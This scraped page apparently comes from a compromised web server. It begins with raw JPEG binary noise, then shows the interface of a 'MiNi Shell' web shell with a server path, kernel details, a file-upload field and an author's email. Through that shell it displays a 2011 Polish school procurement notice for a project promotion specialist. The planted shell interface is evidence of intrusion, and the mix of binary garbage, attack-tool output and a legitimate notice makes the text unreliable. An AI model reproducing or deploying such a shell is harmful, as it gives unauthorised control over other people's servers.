JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110128/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110128/33601-N-2011.html

<p class="kh_header"><b>Zielona Góra: Wykonanie usług zarządzania projektem pn. Nasza szkoła, nasi uczniowie-projekt rozwojowy Gimnazjum nr 1 w Zielonej Górze - w ramach zadania współfinansowanego ze środków Europejskiego Funduszu Społecznego realizowanego przez Gimnazjum nr 1 Zielonej Górze - Specjalista ds. promocji i rekrutacji.</b><br>
<b>Numer ogłoszenia: 33601 - 2011; data zamieszczenia: 28.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> GIMNAZJUM NR 1 , ul. Stefana Wyszyńskiego 101, 65-536 Zielona Góra, woj. lubuskie, tel. 0-68 326 36 80, faks 0-68 326 36 80.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gimnazjum1.zgora.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Szkoła.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usług zarządzania projektem pn. Nasza szkoła, nasi uczniowie-projekt rozwojowy Gimnazjum nr 1 w Zielonej Górze - w ramach zadania współfinansowanego ze środków Europejskiego Funduszu Społecznego realizowanego przez Gimnazjum nr 1 Zielonej Górze - Specjalista ds. promocji i rekrutacji..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usługi Specjalisty ds. promocji i rekrutacji pn.: Nasza szkoła, nasi uczniowie - projekt rozwojowy Gimnazjum nr 1 w Zielonej Górze,  realizowanego przez Miasto Zielona Góra - Gimnazjum nr 1 w Zielonej Górze w ramach Programu Operacyjnego Kapitał Ludzki, Priorytetu IX Roz-wój wykształcenia i kompetencji w regionach, Działania 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym do edukacji oraz zmniejszenie różnic w jakości usług edu-kacyjnych, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Nr projektu: WND-POKL.09.01.02-08-069 10.
2. Projekt obejmuje 5 narzędzi realizacji programów rozwojowych:
.	dodatkowe zajęcia dydaktyczno-wyrównawcze,
.	doradztwo i opiekę pedagogiczno-psychologiczną,
.	dodatkowe zajęcia dla ucz. ukierunkowane na rozwój kompetencji kluczowych,
.	szkolny ośrodek kariery,
.	wdrożenie innowacyjnych form nauczania.
Wsparciem zostanie objętych 206 ucz. G1 z klas I-III. Uczestnicy projektu będą pochodzić z 3 zdefiniowanych grup tj.:
.	młodzież trudna tj. ucz. o opóźnionym rozwoju edukacyjnym oraz pochodzący z rodzin ubogich,
.	niezaradnych oraz wchodzących w kolizję z prawem - 96 ucz.
.	uczniowie uzdolnieni z ubogich rodzin-70 ucz.
.	uczniowie z zaniedbaniami zdrowotnymi -40 ucz.
3. Zakres merytoryczny projektu obejmuje następujące główne zadania:
.	Zadanie 1. Zarządzanie projektem - organizacja biura projektu, organizacja zajęć, bieżący monitoring, 
zakup wyposażenia (wszystkie zakupy w ramach projektu realizowane będą zgodnie z przepisami Ustawy Prawo Zamówień Publicznych),prowadzenie księgowości projektu, wybór kadry nauczyciel-skiej, kontakt z instytucją pośredniczącą, itp. 
.	Zadanie 2. Rekrutacja, Informacja, Promocja i PR projektu - rekrutacja będzie realizowana we wrześniu br., a promocja przez cały czas realizacji projektu. Utworzenie podstrony internetowej, spotkania z rodzicami, tablica ogłoszeń, ulotki, plakaty, informacja w szkolnej gazetce, roll-upy.
.	Zadanie 3. Zajęcia dydaktyczno - wyrównawcze (matematyka).  Uczniowie (24 osoby) zostaną podzieleni na 3 grupy wiekowe po 8 osób. Każda grupa 2 h zajęć w tyg. - 6 h w miesięcu (54 h w roku), w sumie dla 3 grup 162 h.
.	Zadanie 4. Zajęcia dydaktyczno - wyrównawcze (język polski). Uczniowie (24 osób) zostaną podzieleni na 3 grupy wiekowe po 8 osób. Każda grupa 2 h zajęć w tyg. - 6 h w miesiącu (54 h w roku), w sumie dla 3 grup 162 h.
.	Zadanie 5. Zajęcia dydaktyczno - wyrównawcze (język angielski). Uczniowie (24 osób) zostaną podzieleni na 3 grupy wiekowe po 8 osób. Każda grupa 2 h zajęć w tyg. - 6 h w miesiącu (54 h w roku), w sumie dla 3 grup 162 h.
.	Zadanie 6. Zajęcia dydaktyczno - wyrównawcze (język niemiecki). Uczniowie (24 osób) zostaną podzieleni na 3 grupy wiekowe po 8 osób. Każda grupa 2 h zajęć w tyg. - 6 h w miesiącu (54 h w roku), w sumie dla 3 grup 162 h.
.	Zadanie 7. Zajęcia kompetencje kluczowe matematyczno - przyrodnicze. Uczniowie klas I, II, III zostaną podzieleni na 6 zespołów: Pitagoras, Laboratorium chemiczne, Młody fizyk, Koło biologiczne, 
Krajoznawstwo, Fakultet ścisłowca. Przewiduje się 6 grup (35 osób) o różnej liczebności (5-8 os.). Grupa po 2 h zajęć w tyg. - 6 h w miesiącu (54 h w roku), w sumie dla 3 grup 324 h.
.	Zadanie 8. Zajęcia kompetencje kluczowe-przedsiębiorczość, informatyka (ICT) i humanistyka. Uczniowie klas I, II, III zostaną podzieleni na 6 zespołów: Koło młodego przedsiębiorcy, Klub Euromaniak, Zespół redakcyjny GIMZETKI, Koło informatyczne (ICT), Klub teatralny, Fakultet humanisty. Przewiduje się 6 gr. (35 osób) o różnej liczebności(5-8 osób).Grupa po 2 h zajęć w tyg. - 6 h w miesiącu (54 h w roku), w sumie dla 6 grup 324 h.
.	Zadanie 9. Zajęcia aktywizujące. Uczniowie klas I, II, III. Przewiduje się utworzenie 5 gr. po 8 osób (łącznie 40 osób): Klub turystyki rowerowej, Ratownictwo wodne, Pomoc przedmedyczna, Klub nordic walking i rekreację sportową. Grupa ma 2 h zajęć w tyg. - 6 h w miesiącu (54 h w roku),  w sumie dla 5 grup 270 h.
.	Zadanie 10. Zajęcia z dyslektykami - dla 15 uczniów dotkniętych dysleksją rozwojową tj. specyficznymi  trudnościami w uczeniu się m. in. czytania, pisania, liczenia (dla części ucz. biorących udział w zajęciach wyrównawczych) 1x tydzień po 1h w 3 gr. wiekowych (po 5 os.). (dla 1 grupy 3h - miesiącu 27 h w roku, w sumie dla 3 grup 81 h). 
.	Zadanie 11. Opieka pedagogiczno - psychologiczna - 1x tydzień po 1h w 3 grupy wiekowych (po 10 osób). (dla 1 grupy 3h - miesiąc 27 h w roku, w sumie dla 3 grup 81 h). Zajęcia skierowane będą do ucz. wykazujących największe problemy w nauce (ucz. biorących udział w zajęciach wyrównawczych) zagrożonych przedwczesnym wypadnięciem z systemu oświaty. Na zajęciach stosowane będą inno-wacyjne metody nauczania: metoda projektu, ortograffiti - program terapeutyczny rekomendowany przez Polskie Towarzystwo Dysleksji; kinezjologia edukacyjna - metoda przyspieszonego uczenia się; metoda polisensoryczna - angażowanie wielu zmysłów.
.	Zadanie 12. Szkolny ośrodek kariery - SOK będzie miejscem, w którym 20 uczniów biorących udział w jednych z zajęć wymienionych w zadaniach od 3 do 9 otrzyma pomoc w planowaniu swojego dalsze-go kształcenia i kariery zawodowej. Praca będzie przybierać różne formy: treningów, warsztatów, porad indywidualnych pod opieką szkolnego doradcy zawodowego. Z usług SOK będzie można skorzystać 2 x miesiąc po 5 h (10h - miesiąc).Łącznie 90 h w roku szkolnym.
4. Zamówienie obejmuje pełnienie funkcji Specjalisty ds. promocji i rekrutacji, do którego obowiązków będzie należało: 
4.1	Przygotowanie i realizacja strategii rekrutacji uczniów (regulamin, kryteria rekrutacji, raport rekrutacyjny).
4.2	Przygotowanie i realizacja strategii rekrutacji nauczycieli (regulamin, kryteria rekrutacji, raport rekrutacyjny).
4.3	Gromadzenie i archiwizowanie niezbędnych informacji o beneficjentach (uczniach) oraz nauczycielach prowadzących zajęcia.
4.4	Pomoc w wypełnianiu dokumentów  rekrutacyjnych.
4.5	Wypełnianie formularza PEFS.
4.6	Przygotowanie i nadzór nad listą rezerwową uczestników.
4.7	Weryfikacja realizowanych działań informacyjno - promocyjnych w projekcie przez pryzmat wytycznych dotyczących promocji projektów realizowanych ze środków EFS.
4.8	Opracowanie i wykonanie przewidzianych w budżecie instrumentów informacyjno - promocyjnych (plakaty, ulotki, gadżety).
4.9	Właściwe oznakowanie zakupionych środków trwałych, materiałów dydaktycznych, dzienników zajęć, budynku szkoły oraz sal, w których będą prowadzone zajęcia dydaktyczne.
4.10	Bieżąca promocja projektu wśród  uczniów, rodziców, nauczycieli.
4.11	Komunikacja społeczna.
4.12	Podejmowanie działań związanych z marketingiem i public relations projektu (inicjowanie tekstów prasowych, sporządzanie i zamieszczanie informacji o projekcie na stronach internetowych w tym na stronie internetowej projektu).
4.13	Dokonywanie innych czynności zastrzeżonych do kompetencji Specjalisty ds. promocji i rekrutacji.

5. Bezpośredni nadzór nad pracą Specjalisty ds. promocji i rekrutacji sprawuje Kierownik projektu.   
6. Wykonawca gwarantuje pełną dyspozycyjność we wszystkie dni robocze w trakcie trwania projektu. Wyko-nywanie zleconych zadań odbywać się będzie przez czas trwania umowy, głównie w dni robocze po godz. 15:00. Szczegółowe terminy realizacji przedmiotu umowy ustalone zostaną z Zamawiającym.
7. Wykonawcy przyjmujący obowiązki związane z prowadzeniem projektu będą zatrudnieni przez 
Zamawiającego na podstawie umowy zlecenia.
8. Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami opisanymi dla przedmiotu 
zamówienia.
9. Wykonawcę obowiązuje należyta staranność przy realizacji zobowiązań umowy.
10. Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Wykonawcę z ustano-wionym przedstawicielem Zamawiającego.
11. Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna wykazanie, że w okresie ostatnich trzech lat przed upływem terminu składania ofert do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, pełnił funkcję kierowniczą w oświacie  i potrafi udokumentować, że obowiązki te zostały wykonane lub są wykonywane należycie.  
Sprawdzenie ww. warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych dokumentów i oświadczeń wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje osobami zdolnymi do wykonywania zamówienia, a w szczegól-ności odpowiedzialnych za świadczenie usług, posiadające kwalifikacje zawodowe, doświadczenie i wy-kształcenie niezbędne do wykonywanych przez nie czynności tj. minimum 1 osobą, która:
.	posiada wykształcenie wyższe pedagogiczne,
.	posiada ukończony kurs obsługi komputera,
.	pełniła funkcję kierowniczą w oświacie lub organach szkoły
.	ukończyła kurs bhp i kurs udzielania pierwszej pomocy przedlekarskiej
Sprawdzenie ww. warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych doku-mentów i oświadczeń wg zasady spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>.wypełniony formularz oferty wg załącznika Nr 1 do SIWZ;
.oświadczenie, że Wykonawca wykona zamówienie własnymi siłami lub określi część zamówienia, której  wykonanie powierzy Podwykonawcom wg załącznika Nr 6 do SIWZ; 
.wypełnione i podpisane oświadczenie o spełnianiu warunków art. 22 ust. 1 pkt 1 - 4 ustawy pzp w załącznika Nr 7 do SIWZ;
.pisemne zobowiązanie, o którym mowa w pkt  5.2. SIWZ, o ile Wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy pzp;
.zaakceptowany projekty umowy wg załącznika Nr 8 do SIWZ;
.pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gimnazjum1.zgora.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego, ul. Stefana Wyszyńskiego 101, 65- 536 Zielona Góra, sekretariat..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2011 godzina 09:00, miejsce: Siedziba Zamawiającego, ul. Stefana Wyszyńskiego 101, 65- 536 Zielona Góra 
sekretariat szkoły..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Tak
Nr projektu: WND-POKL.09.01.02-08-069/10.
Nasza szkoła, nasi uczniowie-projekt rozwojowy Gimnazjum nr 1 w Zielonej Górze.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com